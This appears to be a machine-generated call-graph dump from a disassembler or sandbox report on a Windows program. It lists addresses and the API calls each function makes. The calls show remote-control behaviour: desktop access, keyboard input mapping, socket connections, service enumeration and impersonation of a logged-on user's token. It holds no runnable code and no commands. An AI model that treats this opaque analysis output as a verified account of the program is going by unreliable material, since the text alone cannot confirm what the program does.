22405->22411 22407 7ff6c2ba873b 22407->22400 22409 7ff6c2ba8740 SendMessageA 22407->22409 22408->22411 22409->22400 22410 7ff6c2ba87ea DeleteObject 22412 7ff6c2c38bf4 free 70 API calls 22410->22412 22411->22410 22413 7ff6c2ba881c DeleteObject 22412->22413 22414 7ff6c2c38bf4 free 70 API calls 22413->22414 22415 7ff6c2ba8844 DeleteObject 22414->22415 22416 7ff6c2c38bf4 free 70 API calls 22415->22416 22417 7ff6c2ba885d DeleteObject 22416->22417 22418 7ff6c2c38bf4 free 70 API calls 22417->22418 22419 7ff6c2ba8876 22418->22419 22425 7ff6c2b94140 22421->22425 22423 7ff6c2b94124 22423->22394 22424->22407 22426 7ff6c2b9415c _RunAllParam 22425->22426 22427 7ff6c2b941b4 SendMessageA 22426->22427 22428 7ff6c2b941c6 22426->22428 22427->22428 22429 7ff6c2b941cf FreeLibrary 22428->22429 22430 7ff6c2b941d5 22428->22430 22429->22430 22430->22423 23243 7ff6c2b9b3d0 96 API calls 2 library calls 23244 7ff6c2c3e9bc 81 API calls 3 library calls 23245 7ff6c2bd7bd0 21 API calls _getdrive 23247 7ff6c2b855d0 72 API calls sprintf 23248 7ff6c2ba89e0 93 API calls _RunAllParam 23249 7ff6c2b93be0 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey RegCloseKey 23250 7ff6c2b909e0 82 API calls 2 library calls 23251 7ff6c2b9dde0 152 API calls 23254 7ff6c2badbf0 13 API calls _RunAllParam 23255 7ff6c2baebf0 141 API calls 2 library calls 23256 7ff6c2b903f0 CombineRgn 23258 7ff6c2b879e9 75 API calls 3 library calls 23259 7ff6c2b865f1 8 API calls _getdrive 23260 7ff6c2bae780 97 API calls __wtomb_environ 23262 7ff6c2ba4003 254 API calls 2 library calls 23263 7ff6c2b8cf80 120 API calls 4 library calls 23264 7ff6c2b8f780 71 API calls __wtomb_environ 23265 7ff6c2b9bb80 122 API calls 2 library calls 23266 7ff6c2b9dd80 121 API calls 23268 7ff6c2ba9390 121 API calls _RunAllParam 23269 7ff6c2baf790 96 API calls 2 library calls 23271 7ff6c2b8d790 11 API calls _getdrive 23272 7ff6c2b98190 125 API calls _RunAllParam 23273 7ff6c2b84790 DeleteCriticalSection 23274 7ff6c2bb13a0 7 API calls 23276 7ff6c2b99ba0 SetEvent Sleep Sleep 23277 7ff6c2ba4003 281 API calls 3 library calls 23278 7ff6c2baebb0 71 API calls 23279 7ff6c2baa9b0 114 API calls _getdrive 23280 7ff6c2b8ffb0 SetRectRgn SetRectRgn SetRectRgn 23281 7ff6c2ba05b0 168 API calls _RunAllParam 23285 7ff6c2b881ad 272 API calls 2 library calls 23286 7ff6c2bb5940 109 API calls 23287 7ff6c2bb6d40 165 API calls 4 library calls 23288 7ff6c2b99740 101 API calls 2 library calls 22657 7ff6c2becd40 inet_addr 22658 7ff6c2becdae htons connect 22657->22658 22659 7ff6c2becd89 gethostbyname 22657->22659 22660 7ff6c2becda1 22658->22660 22662 7ff6c2becdd5 22658->22662 22659->22660 22661 7ff6c2becd97 22659->22661 22664 7ff6c2c37220 _getdrive 8 API calls 22660->22664 22661->22658 22661->22660 22663 7ff6c2becf90 14 API calls 22662->22663 22663->22660 22665 7ff6c2becded 22664->22665 23290 7ff6c2ba4003 261 API calls 2 library calls 23291 7ff6c2ba9150 89 API calls _RunAllParam 23292 7ff6c2bad150 177 API calls 3 library calls 23293 7ff6c2b8a550 104 API calls _RunAllParam 23295 7ff6c2b93550 14 API calls _getdrive 23296 7ff6c2b93d50 12 API calls _getdrive 23297 7ff6c2b95550 99 API calls 4 library calls 23299 7ff6c2b9e550 97 API calls 23302 7ff6c2bd1550 110 API calls _RunAllParam 23303 7ff6c2b9d149 96 API calls _RunAllParam 23304 7ff6c2b86753 RegCloseKey 23305 7ff6c2b92b5e 87 API calls 23306 7ff6c2b90760 95 API calls free 23307 7ff6c2b8d560 19 API calls 2 library calls 22666 7ff6c2ba5958 22667 7ff6c2ba596d 22666->22667 22668 7ff6c2ba597e EnterCriticalSection 22667->22668 22738 7ff6c2bac2c0 22667->22738 22779 7ff6c2bed890 97 API calls _RunAllParam 22668->22779 22673 7ff6c2ba59e2 22674 7ff6c2ba7afe FlushFileBuffers 22673->22674 22675 7ff6c2ba7b2e 22673->22675 22713 7ff6c2ba4003 22673->22713 22782 7ff6c2bedfc0 CloseHandle 22674->22782 22677 7ff6c2ba7b4e FlushFileBuffers 22675->22677 22675->22713 22783 7ff6c2bedfc0 CloseHandle 22677->22783 22678 7ff6c2ba7b99 LeaveCriticalSection 22678->22713 22681 7ff6c2ba7c81 Sleep 22682 7ff6c2ba7c95 22681->22682 22683 7ff6c2ba7cf7 22682->22683 22684 7ff6c2ba7ca6 FlushFileBuffers 22682->22684 22686 7ff6c2ba7d59 22683->22686 22687 7ff6c2ba7d08 FlushFileBuffers 22683->22687 22684->22683 22685 7ff6c2ba7ce6 CloseHandle 22684->22685 22685->22683 22785 7ff6c2bea3b0 93 API calls 2 library calls 22686->22785 22687->22686 22689 7ff6c2ba7d48 CloseHandle 22687->22689 22689->22686 22690 7ff6c2ba7d62 22692 7ff6c2ba7d85 22690->22692 22786 7ff6c2bb2170 16 API calls 22690->22786 22695 7ff6c2ba7d9d CloseDesktop 22692->22695 22696 7ff6c2ba7dbc 22692->22696 22694 7ff6c2bb2220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 22694->22713 22695->22696 22697 7ff6c2ba7da7 22695->22697 22702 7ff6c2b83730 _RunAllParam 89 API calls 22696->22702 22700 7ff6c2b83730 _RunAllParam 89 API calls 22697->22700 22698 7ff6c2ba31b0 27 API calls 22698->22713 22700->22696 22701 7ff6c2bac590 16 API calls 22701->22713 22703 7ff6c2ba7dfc GetModuleFileNameA 22702->22703 22708 7ff6c2ba7e15 22703->22708 22709 7ff6c2ba7e56 LoadLibraryA 22703->22709 22705 7ff6c2ba419d GetTickCount 22705->22713 22706 7ff6c2b83730 _RunAllParam 89 API calls 22710 7ff6c2ba4075 OpenInputDesktop 22706->22710 22707 7ff6c2bed440 16 API calls 22707->22713 22787 7ff6c2c3a140 70 API calls 3 library calls 22708->22787 22712 7ff6c2ba7e6b GetProcAddress 22709->22712 22721 7ff6c2ba7e9d 22709->22721 22710->22713 22727 7ff6c2ba7c54 22710->22727 22718 7ff6c2ba7e8f FreeLibrary 22712->22718 22713->22678 22713->22694 22713->22698 22713->22701 22713->22705 22713->22706 22713->22707 22714 7ff6c2bed890 97 API calls 22713->22714 22716 7ff6c2b83730 89 API calls _RunAllParam 22713->22716 22719 7ff6c2ba7c72 22713->22719 22724 7ff6c2ba7c47 CloseDesktop 22713->22724 22728 7ff6c2ba40bf CloseDesktop 22713->22728 22775 7ff6c2bea5b0 98 API calls 2 library calls 22713->22775 22776 7ff6c2bea3b0 93 API calls 2 library calls 22713->22776 22777 7ff6c2be95d0 EnterCriticalSection LeaveCriticalSection 22713->22777 22778 7ff6c2bac6f0 18 API calls _RunAllParam 22713->22778 22780 7ff6c2bab290 148 API calls 22713->22780 22781 7ff6c2bac660 17 API calls 22713->22781 22784 7ff6c2bac4e0 93 API calls _RunAllParam 22713->22784 22714->22713 22715 7ff6c2ba7e26 22715->22709 22716->22713 22717 7ff6c2b83730 _RunAllParam 89 API calls 22717->22719 22718->22721 22719->22681 22719->22682 22729 7ff6c2ba7edd 22721->22729 22788 7ff6c2b9e580 97 API calls _RunAllParam 22721->22788 22724->22719 22724->22727 22727->22717 22728->22713 22730 7ff6c2ba7fb2 22729->22730 22733 7ff6c2b83730 _RunAllParam 89 API calls 22729->22733 22732 7ff6c2c37220 _getdrive 8 API calls 22730->22732 22734 7ff6c2ba7ff0 22732->22734 22736 7ff6c2ba7f3e 22733->22736 22789 7ff6c2beab00 95 API calls _RunAllParam 22736->22789 22739 7ff6c2b83730 _RunAllParam 89 API calls 22738->22739 22740 7ff6c2bac309 EnterCriticalSection 22739->22740 22742 7ff6c2bac348 22740->22742 22743 7ff6c2bac338 LeaveCriticalSection 22740->22743 22745 7ff6c2bac363 22742->22745 22746 7ff6c2bac353 LeaveCriticalSection 22742->22746 22744 7ff6c2bac4b7 22743->22744 22747 7ff6c2c37220 _getdrive 8 API calls 22744->22747 22748 7ff6c2bac37e 22745->22748 22749 7ff6c2bac36e LeaveCriticalSection 22745->22749 22746->22744 22751 7ff6c2bac4c7 22747->22751 22750 7ff6c2b83730 _RunAllParam 89 API calls 22748->22750 22749->22744 22752 7ff6c2bac393 22750->22752 22751->22668 22790 7ff6c2bea130 73 API calls _getdrive 22752->22790 22754 7ff6c2bac39a 22755 7ff6c2bac39e 22754->22755 22756 7ff6c2bac3cd 22754->22756 22757 7ff6c2b83730 _RunAllParam 89 API calls 22755->22757 22791 7ff6c2bea0c0 22756->22791 22759 7ff6c2bac3bc LeaveCriticalSection 22757->22759 22759->22744 22760 7ff6c2bac3d7 22761 7ff6c2b83730 _RunAllParam 89 API calls 22760->22761 22762 7ff6c2bac3f1 22761->22762 22763 7ff6c2bac4a1 22762->22763 22794 7ff6c2be9bc0 LoadLibraryA 22762->22794 22764 7ff6c2bac4a3 LeaveCriticalSection 22763->22764 22764->22744 22767 7ff6c2bac480 22767->22764 22772 7ff6c2bac491 timeGetTime 22767->22772 22768 7ff6c2bac413 OpenProcess OpenProcessToken 22769 7ff6c2bac446 ImpersonateLoggedOnUser 22768->22769 22770 7ff6c2bac43d 22768->22770 22769->22770 22771 7ff6c2bac46c CloseHandle CloseHandle 22769->22771 22773 7ff6c2b83730 _RunAllParam 89 API calls 22770->22773 22771->22767 22772->22764 22774 7ff6c2bac46a 22773->22774 22774->22771 22775->22713 22776->22713 22778->22713 22779->22673 22780->22713 22781->22713 22782->22675 22783->22713 22784->22713 22785->22690 22787->22715 22789->22730 22790->22754 22817 7ff6c2be9ef0 22791->22817 22793 7ff6c2bea0d2 22793->22760 22795 7ff6c2be9c11 GetProcAddress GetProcAddress 22794->22795 22796 7ff6c2be9c46 22794->22796 22795->22796 22798 7ff6c2be9c40 22795->22798 22797 7ff6c2be9c49 GetSystemMetrics 22796->22797 22799 7ff6c2be9c80 CreateToolhelp32Snapshot 22797->22799 22800 7ff6c2be9c58 22797->22800 22798->22797 22802 7ff6c2be9c94 Process32First 22799->22802 22803 7ff6c2be9cb7 22799->22803 22800->22799 22801 7ff6c2be9c61 GetCurrentProcessId ProcessIdToSessionId 22800->22801 22801->22799 22804 7ff6c2be9cae CloseHandle 22802->22804 22809 7ff6c2be9cd0 22802->22809 22805 7ff6c2be9cbc FreeLibrary 22803->22805 22806 7ff6c2be9cc5 22803->22806 22804->22803 22805->22806 22808 7ff6c2c37220 _getdrive 8 API calls 22806->22808 22810 7ff6c2bac40f 22808->22810 22811 7ff6c2be9d5a Process32Next 22809->22811 22812 7ff6c2be9d0b CloseHandle 22809->22812 22813 7ff6c2be9cf6 ProcessIdToSessionId 22809->22813 22858 7ff6c2c39700 22809->22858 22810->22767 22810->22768 22811->22809 22811->22812 22815 7ff6c2be9d1d FreeLibrary 22812->22815 22816 7ff6c2be9d26 22812->22816 22813->22809 22813->22811 22815->22816 22816->22806 22818 7ff6c2be9f28 22817->22818 22832 7ff6c2be9fdc 22817->22832 22820 7ff6c2be9f30 GetProcessWindowStation 22818->22820 22818->22832 22819 7ff6c2be9fec 22846 7ff6c2be9d80 22819->22846 22822 7ff6c2be9f47 GetUserObjectInformationA GetLastError SetLastError 22820->22822 22823 7ff6c2be9f3b 22820->22823 22826 7ff6c2be9fae 22822->22826 22827 7ff6c2be9f79 RevertToSelf 22822->22827 22824 7ff6c2b83730 _RunAllParam 89 API calls 22823->22824 22828 7ff6c2bea0a9 22824->22828 22826->22832 22833 7ff6c2be9fb7 22826->22833 22831 7ff6c2b83730 _RunAllParam 89 API calls 22827->22831 22828->22793 22829 7ff6c2bea000 GetUserNameA 22830 7ff6c2bea06f 22829->22830 22834 7ff6c2bea012 GetLastError 22829->22834 22836 7ff6c2b83730 _RunAllParam 89 API calls 22830->22836 22835 7ff6c2be9fa1 22831->22835 22832->22819 22832->22823 22837 7ff6c2b83730 _RunAllParam 89 API calls 22833->22837 22838 7ff6c2bea044 GetLastError 22834->22838 22839 7ff6c2bea01f 22834->22839 22835->22793 22840 7ff6c2bea087 22836->22840 22841 7ff6c2be9fcc 22837->22841 22843 7ff6c2b83730 _RunAllParam 89 API calls 22838->22843 22842 7ff6c2b83730 _RunAllParam 89 API calls 22839->22842 22840->22793 22841->22793 22844 7ff6c2bea034 22842->22844 22845 7ff6c2bea062 22843->22845 22844->22793 22845->22793 22847 7ff6c2be9bc0 84 API calls 22846->22847 22848 7ff6c2be9da3 22847->22848 22849 7ff6c2be9dae OpenProcess OpenProcessToken 22848->22849 22857 7ff6c2be9da7 22848->22857 22850 7ff6c2be9de0 22849->22850 22851 7ff6c2be9de7 GetTokenInformation 22849->22851 22853 7ff6c2be9eb7 CloseHandle 22850->22853 22854 7ff6c2be9ea9 CloseHandle 22851->22854 22855 7ff6c2be9e16 LookupAccountSidA CloseHandle CloseHandle 22851->22855 22852 7ff6c2c37220 _getdrive 8 API calls 22856 7ff6c2be9eda 22852->22856 22853->22857 22854->22853 22855->22857 22856->22829 22856->22830 22857->22852 22859 7ff6c2c3970d 22858->22859 22860 7ff6c2c39731 22858->22860 22859->22860 22861 7ff6c2c3ffc8 _errno 70 API calls 22859->22861 22862 7ff6c2c39717 22861->22862 22863 7ff6c2c449d4 _invalid_parameter_noinfo 17 API calls 22862->22863 22864 7ff6c2c39722 22863->22864 22864->22809 23310 7ff6c2b8ab70 95 API calls _RunAllParam 23311 7ff6c2b90b70 89 API calls 23312 7ff6c2b94970 97 API calls 2 library calls 23315 7ff6c2b83770 111 API calls 2 library calls 23316 7ff6c2bb5100 82 API calls 2 library calls 23317 7ff6c2bb0700 9 API calls 22224 7ff6c2b89d00 22245 7ff6c2b829a0 22224->22245 22226 7ff6c2b89db3 OpenSCManagerA 22227 7ff6c2b89de0 EnumServicesStatusA 22226->22227 22228 7ff6c2b89dc9 22226->22228 22229 7ff6c2b89e2b GetLastError 22227->22229 22230 7ff6c2b89fed CloseServiceHandle 22227->22230 22233 7ff6c2c37220 _getdrive 8 API calls 22228->22233 22229->22230 22232 7ff6c2b89e3c 22229->22232 22230->22228 22231 7ff6c2b89d6b 22231->22226 22232->22230 22235 7ff6c2b89e54 EnumServicesStatusA 22232->22235 22234 7ff6c2b8a017 22233->22234 22236 7ff6c2b89e93 22235->22236 22237 7ff6c2b89fe1 _RunAllParam 22235->22237 22236->22237 22238 7ff6c2b89eac OpenServiceA 22236->22238 22237->22230 22238->22237 22239 7ff6c2b89ecb QueryServiceConfigA 22238->22239 22240 7ff6c2b89ee5 GetLastError 22239->22240 22241 7ff6c2b89fc7 CloseServiceHandle 22239->22241 22240->22241 22244 7ff6c2b89ef4 _RunAllParam 22240->22244 22241->22236 22241->22237 22242 7ff6c2b89f08 QueryServiceConfigA 22242->22244 22243 7ff6c2b829a0 81 API calls 22243->22244 22244->22241 22244->22242 22244->22243 22246 7ff6c2b82a17 22245->22246 22249 7ff6c2b829bd 22245->22249 22247 7ff6c2b82a29 22246->22247 22264 7ff6c2c370b4 71 API calls std::exception::exception 22246->22264 22251 7ff6c2b82a42 22247->22251 22265 7ff6c2b83050 81 API calls std::exception::exception 22247->22265 22249->22246 22252 7ff6c2b829e6 22249->22252 22251->22231 22253 7ff6c2b82d12 22252->22253 22266 7ff6c2c37110 71 API calls std::exception::exception 22252->22266 22255 7ff6c2b82d22 22253->22255 22256 7ff6c2b82d41 22253->22256 22267 7ff6c2b82fb0 71 API calls 22255->22267 22258 7ff6c2b82d53 22256->22258 22269 7ff6c2c370b4 71 API calls std::exception::exception 22256->22269 22263 7ff6c2b82d3c 22258->22263 22270 7ff6c2b83050 81 API calls std::exception::exception 22258->22270 22259 7ff6c2b82d2f 22268 7ff6c2b82fb0 71 API calls 22259->22268 22263->22231 22264->22247 22265->22251 22266->22253 22267->22259 22268->22263 22269->22258 22270->22263 23318 7ff6c2b92d00 24 API calls 23319 7ff6c2b8f700 280 API calls 2 library calls 23321 7ff6c2bb34f7 10 API calls _getdrive 23322 7ff6c2baab10 96 API calls 2 library calls 23323 7ff6c2b90310 73 API calls free 23324 7ff6c2b93110 73 API calls 2 library calls 23325 7ff6c2b89910 11 API calls _getdrive 23326 7ff6c2b8a910 99 API calls _RunAllParam 23327 7ff6c2ba4003 239 API calls 2 library calls 23328 7ff6c2b85910 13 API calls _getdrive 23334 7ff6c2bb3523 92 API calls 2 library calls 23335 7ff6c2ba4003 265 API calls 2 library calls 23337 7ff6c2b8ff30 11 API calls _getdrive 23338 7ff6c2ba3530 120 API calls 2 library calls 23339 7ff6c2b9a130 173 API calls 4 library calls 23342 7ff6c2ba92c0 119 API calls _RunAllParam 23343 7ff6c2baf8c0 72 API calls _getdrive 23344 7ff6c2b97ac0 10 API calls _RunAllParam 23346 7ff6c2ba22c0 114 API calls 5 library calls 23351 7ff6c2ba8ed0 127 API calls _getdrive 23352 7ff6c2b900d0 88 API calls 2 library calls 22431 7ff6c2ba36d0 SetErrorMode 22432 7ff6c2ba3734 22431->22432 22433 7ff6c2b83730 _RunAllParam 89 API calls 22432->22433 22434 7ff6c2ba3764 GetCurrentThreadId GetThreadDesktop 22433->22434 22435 7ff6c2ba3799 22434->22435 22557 7ff6c2ba33a0 22435->22557 22436 7ff6c2ba37b4 22472 7ff6c2ba39df 22436->22472 22569 7ff6c2b9f940 22436->22569 22438 7ff6c2ba39ea 22439 7ff6c2b83730 _RunAllParam 89 API calls 22438->22439 22446 7ff6c2ba3a11 22439->22446 22440 7ff6c2c37220 _getdrive 8 API calls 22442 7ff6c2ba7ff0 22440->22442 22441 7ff6c2ba37ce 22585 7ff6c2c3851c 22441->22585 22444 7ff6c2ba3825 22445 7ff6c2c392a4 __wtomb_environ 70 API calls 22444->22445 22447 7ff6c2ba3838 22445->22447 22450 7ff6c2ba7ef3 22446->22450 22606 7ff6c2bed170 22446->22606 22448 7ff6c2c392a4 __wtomb_environ 70 API calls 22447->22448 22449 7ff6c2ba3842 22448->22449 22591 7ff6c2bea320 22449->22591 22453 7ff6c2b83730 _RunAllParam 89 API calls 22450->22453 22450->22472 22465 7ff6c2ba7f3e 22453->22465 22455 7ff6c2ba3a76 22457 7ff6c2b83730 _RunAllParam 89 API calls 22455->22457 22456 7ff6c2ba3867 22459 7ff6c2c38bf4 free 70 API calls 22456->22459 22461 7ff6c2ba3874 22456->22461 22460 7ff6c2ba3a8e timeGetTime 22457->22460 22458 7ff6c2c38bf4 free 70 API calls 22458->22456 22459->22461 22462 7ff6c2ba3aaf 22460->22462 22463 7ff6c2ba3905 22461->22463 22467 7ff6c2ba38d0 SleepEx 22461->22467 22461->22472 22610 7ff6c2be5f30 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 22462->22610 22469 7ff6c2b83730 _RunAllParam 89 API calls 22463->22469 22617 7ff6c2beab00 95 API calls _RunAllParam 22465->22617 22466 7ff6c2ba3abc 22468 7ff6c2ba3ac0 EnterCriticalSection 22466->22468 22473 7ff6c2ba3b17 _recalloc 22466->22473 22467->22461 22467->22472 22474 7ff6c2ba3af7 22468->22474 22481 7ff6c2ba3947 22469->22481 22472->22440 22475 7ff6c2ba3bd1 GetComputerNameA 22473->22475 22611 7ff6c2b9aed0 89 API calls _recalloc 22474->22611 22477 7ff6c2ba3c52 22475->22477 22483 7ff6c2ba3bec 22475->22483 22479 7ff6c2ba3c83 gethostname 22477->22479 22487 7ff6c2ba3c57 22477->22487 22478 7ff6c2ba3b0d LeaveCriticalSection 22478->22473 22482 7ff6c2ba3caf 22479->22482 22479->22487 22596 7ff6c2bea290 22481->22596 22613 7ff6c2ba3220 71 API calls 2 library calls 22482->22613 22612 7ff6c2c38e5c 70 API calls 4 library calls 22483->22612 22486 7ff6c2ba39c2 22486->22472 22489 7ff6c2b83730 _RunAllParam 89 API calls 22486->22489 22614 7ff6c2bed710 15 API calls 22487->22614 22489->22472 22490 7ff6c2ba3ec4 22490->22472 22615 7ff6c2bed600 14 API calls 22490->22615 22492 7ff6c2ba3eed 22492->22472 22493 7ff6c2b83730 _RunAllParam 89 API calls 22492->22493 22494 7ff6c2ba3f0d EnterCriticalSection 22493->22494 22496 7ff6c2c392a4 __wtomb_environ 70 API calls 22494->22496 22497 7ff6c2ba3f5f CreateRectRgn 22496->22497 22498 7ff6c2ba3f95 DeleteObject 22497->22498 22499 7ff6c2c38bf4 free 70 API calls 22498->22499 22500 7ff6c2ba3faa LeaveCriticalSection 22499->22500 22616 7ff6c2c17d90 EnterCriticalSection SetThreadPriority GetLastError LeaveCriticalSection RaiseException 22500->22616 22558 7ff6c2ba33c1 22557->22558 22559 7ff6c2bed170 2 API calls 22558->22559 22560 7ff6c2ba33cf 22559->22560 22561 7ff6c2ba33d3 GetLastError 22560->22561 22564 7ff6c2ba33f1 22560->22564 22562 7ff6c2b83730 _RunAllParam 89 API calls 22561->22562 22562->22564 22563 7ff6c2b83730 _RunAllParam 89 API calls 22565 7ff6c2ba351a 22563->22565 22566 7ff6c2b83730 _RunAllParam 89 API calls 22564->22566 22567 7ff6c2ba3441 22564->22567 22565->22436 22566->22567 22567->22563 22568 7ff6c2ba349e 22567->22568 22568->22436 22579 7ff6c2b9f980 22569->22579 22571 7ff6c2b9fae6 SleepEx 22571->22579 22572 7ff6c2b9fb50 22584 7ff6c2b9fb49 22572->22584 22633 7ff6c2c38bbc 70 API calls swscanf 22572->22633 22573 7ff6c2c37220 _getdrive 8 API calls 22575 7ff6c2b9fc50 22573->22575 22575->22438 22575->22441 22577 7ff6c2b9fb8c 22583 7ff6c2b83730 _RunAllParam 89 API calls 22577->22583 22577->22584 22578 7ff6c2b9fa11 22578->22571 22578->22579 22632 7ff6c2bed890 97 API calls _RunAllParam 22578->22632 22579->22571 22579->22572 22579->22578 22580 7ff6c2b9fa5e EnterCriticalSection 22579->22580 22579->22584 22618 7ff6c2c37c50 22579->22618 22624 7ff6c2bed1f0 GetTickCount 22579->22624 22582 7ff6c2b9fa91 LeaveCriticalSection 22580->22582 22582->22579 22583->22584 22584->22573 22586 7ff6c2c3854e _recalloc 22585->22586 22587 7ff6c2c3ffc8 _errno 70 API calls 22586->22587 22590 7ff6c2c38563 22586->22590 22588 7ff6c2c38558 22587->22588 22589 7ff6c2c449d4 _invalid_parameter_noinfo 17 API calls 22588->22589 22589->22590 22590->22444 22592 7ff6c2bea340 FindWindowExA 22591->22592 22593 7ff6c2ba3856 22592->22593 22594 7ff6c2bea35d GetWindowThreadProcessId GetCurrentProcessId 22592->22594 22593->22456 22593->22458 22593->22461 22594->22592 22595 7ff6c2bea37c PostMessageA 22594->22595 22595->22593 22597 7ff6c2bea303 22596->22597 22598 7ff6c2bea2b0 22596->22598 22600 7ff6c2bea340 FindWindowExA 22597->22600 22598->22597 22599 7ff6c2bea2b9 FindWindowA 22598->22599 22601 7ff6c2bea2dd PostMessageA 22599->22601 22602 7ff6c2bea2cd 22599->22602 22603 7ff6c2bea392 22600->22603 22604 7ff6c2bea35d GetWindowThreadProcessId GetCurrentProcessId 22600->22604 22601->22486 22602->22486 22603->22486 22604->22600 22605 7ff6c2bea37c PostMessageA 22604->22605 22605->22603 22607 7ff6c2bed182 22606->22607 22608 7ff6c2bed18a setsockopt 22606->22608 22607->22455 22608->22607 22609 7ff6c2bed1b5 setsockopt 22608->22609 22609->22455 22610->22466 22611->22478 22612->22477 22613->22487 22614->22490 22615->22492 22617->22472 22619 7ff6c2c37c83 _recalloc 22618->22619 22620 7ff6c2c3ffc8 _errno 70 API calls 22619->22620 22623 7ff6c2c37c98 22619->22623 22621 7ff6c2c37c8d 22620->22621 22622 7ff6c2c449d4 _invalid_parameter_noinfo 17 API calls 22621->22622 22622->22623 22623->22579 22625 7ff6c2bed22f 22624->22625 22627 7ff6c2bed2b6 22624->22627 22628 7ff6c2bedd90 11 API calls 22625->22628 22626 7ff6c2bed25f 22626->22579 22627->22626 22630 7ff6c2bedd90 11 API calls 22627->22630 22629 7ff6c2bed25b 22628->22629 22629->22626 22629->22627 22631 7ff6c2bedd90 11 API calls 22629->22631 22630->22626 22631->22629 22632->22578 22633->22577 23355 7ff6c2b828d0 81 API calls 23358 7ff6c2bb1ae0 15 API calls _getdrive 23359 7ff6c2bb08e0 117 API calls _RunAllParam 22865 7ff6c2ba4cdb 23076 7ff6c2bed890 97 API calls _RunAllParam 22865->23076 22867 7ff6c2ba4cfc 22868 7ff6c2ba4d52 22867->22868 22930 7ff6c2bd0650 22867->22930 23077 7ff6c2baf010 SetEvent 22868->23077 22872 7ff6c2ba7c72 22873 7ff6c2ba7c81 Sleep 22872->22873 22874 7ff6c2ba7c95 22872->22874 22873->22874 22875 7ff6c2ba7cf7 22874->22875 22876 7ff6c2ba7ca6 FlushFileBuffers 22874->22876 22878 7ff6c2ba7d59 22875->22878 22879 7ff6c2ba7d08 FlushFileBuffers 22875->22879 22876->22875 22877 7ff6c2ba7ce6 CloseHandle 22876->22877 22877->22875 23081 7ff6c2bea3b0 93 API calls 2 library calls 22878->23081 22879->22878 22881 7ff6c2ba7d48 CloseHandle 22879->22881 22881->22878 22882 7ff6c2ba7d62 22884 7ff6c2ba7d85 22882->22884 23082 7ff6c2bb2170 16 API calls 22882->23082 22886 7ff6c2ba7d9d CloseDesktop 22884->22886 22887 7ff6c2ba7dbc 22884->22887 22886->22887 22889 7ff6c2ba7da7 22886->22889 22894 7ff6c2b83730 _RunAllParam 89 API calls 22887->22894 22888 7ff6c2bb2220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 22925 7ff6c2ba4003 22888->22925 22892 7ff6c2b83730 _RunAllParam 89 API calls 22889->22892 22890 7ff6c2ba31b0 27 API calls 22890->22925 22892->22887 22893 7ff6c2bac590 16 API calls 22893->22925 22895 7ff6c2ba7dfc GetModuleFileNameA 22894->22895 22899 7ff6c2ba7e15 22895->22899 22900 7ff6c2ba7e56 LoadLibraryA 22895->22900 22897 7ff6c2ba419d GetTickCount 22897->22925 22898 7ff6c2b83730 _RunAllParam 89 API calls 22901 7ff6c2ba4075 OpenInputDesktop 22898->22901 23083 7ff6c2c3a140 70 API calls 3 library calls 22899->23083 22903 7ff6c2ba7e6b GetProcAddress 22900->22903 22904 7ff6c2ba7e9d 22900->22904 22905 7ff6c2ba7c54 22901->22905 22901->22925 22910 7ff6c2ba7e8f FreeLibrary 22903->22910 22919 7ff6c2ba7edd 22904->22919 23084 7ff6c2b9e580 97 API calls _RunAllParam 22904->23084 22909 7ff6c2b83730 _RunAllParam 89 API calls 22905->22909 22906 7ff6c2ba7e26 22906->22900 22907 7ff6c2bed440 16 API calls 22907->22925 22908 7ff6c2b83730 89 API calls _RunAllParam 22908->22925 22909->22872 22910->22904 22914 7ff6c2bed890 97 API calls 22914->22925 22915 7ff6c2ba7c47 CloseDesktop 22915->22872 22915->22905 22918 7ff6c2ba40bf CloseDesktop 22918->22925 22920 7ff6c2ba7fb2 22919->22920 22924 7ff6c2b83730 _RunAllParam 89 API calls 22919->22924 22923 7ff6c2c37220 _getdrive 8 API calls 22920->22923 22921 7ff6c2ba7b99 LeaveCriticalSection 22921->22925 22926 7ff6c2ba7ff0 22923->22926 22928 7ff6c2ba7f3e 22924->22928 22925->22872 22925->22888 22925->22890 22925->22893 22925->22897 22925->22898 22925->22907 22925->22908 22925->22914 22925->22915 22925->22918 22925->22921 23072 7ff6c2bea5b0 98 API calls 2 library calls 22925->23072 23073 7ff6c2bea3b0 93 API calls 2 library calls 22925->23073 23074 7ff6c2be95d0 EnterCriticalSection LeaveCriticalSection 22925->23074 23075 7ff6c2bac6f0 18 API calls _RunAllParam 22925->23075 23078 7ff6c2bab290 148 API calls 22925->23078 23079 7ff6c2bac660 17 API calls 22925->23079 23080 7ff6c2bac4e0 93 API calls _RunAllParam 22925->23080 23085 7ff6c2beab00 95 API calls _RunAllParam 22928->23085 22931 7ff6c2b83730 _RunAllParam 89 API calls 22930->22931 22932 7ff6c2bd068e 22931->22932 22933 7ff6c2bd09af VkKeyScanA 22932->22933 22934 7ff6c2bd102e 22932->22934 22936 7ff6c2b83730 _RunAllParam 89 API calls 22932->22936 22940 7ff6c2bd09c2 22933->22940 22937 7ff6c2bd109a 22934->22937 22941 7ff6c2b83730 _RunAllParam 89 API calls 22934->22941 22935 7ff6c2b83730 _RunAllParam 89 API calls 22938 7ff6c2bd0a08 22935->22938 22939 7ff6c2bd0743 22936->22939 22948 7ff6c2bd10ee 22937->22948 23120 7ff6c2bd2ef0 81 API calls 22937->23120 22942 7ff6c2bd0a13 22938->22942 22943 7ff6c2bd0d54 GetKeyState 22938->22943 22944 7ff6c2b83730 _RunAllParam 89 API calls 22939->22944 22940->22935 22941->22937 22946 7ff6c2bd0d0a 22942->22946 22947 7ff6c2b83730 _RunAllParam 89 API calls 22942->22947 22945 7ff6c2bd0d71 22943->22945 22944->22933 22950 7ff6c2bd0dbf 22945->22950 23039 7ff6c2bd0eaa 22945->23039 22946->22868 22951 7ff6c2bd0a33 22947->22951 23086 7ff6c2bd1620 22948->23086 22954 7ff6c2bd0e0a 22950->22954 22955 7ff6c2bd0dc9 GetAsyncKeyState 22950->22955 22957 7ff6c2b83730 _RunAllParam 89 API calls 22951->22957 22952 7ff6c2b83730 _RunAllParam 89 API calls 22960 7ff6c2bd0fe2 MapVirtualKeyA 22952->22960 22953 7ff6c2bd10df 23121 7ff6c2bd2370 71 API calls 22953->23121 22958 7ff6c2bd0e14 GetAsyncKeyState 22954->22958 22959 7ff6c2bd0e58 22954->22959 22955->22954 22962 7ff6c2bd0dd8 MapVirtualKeyA 22955->22962 22964 7ff6c2bd0a4b 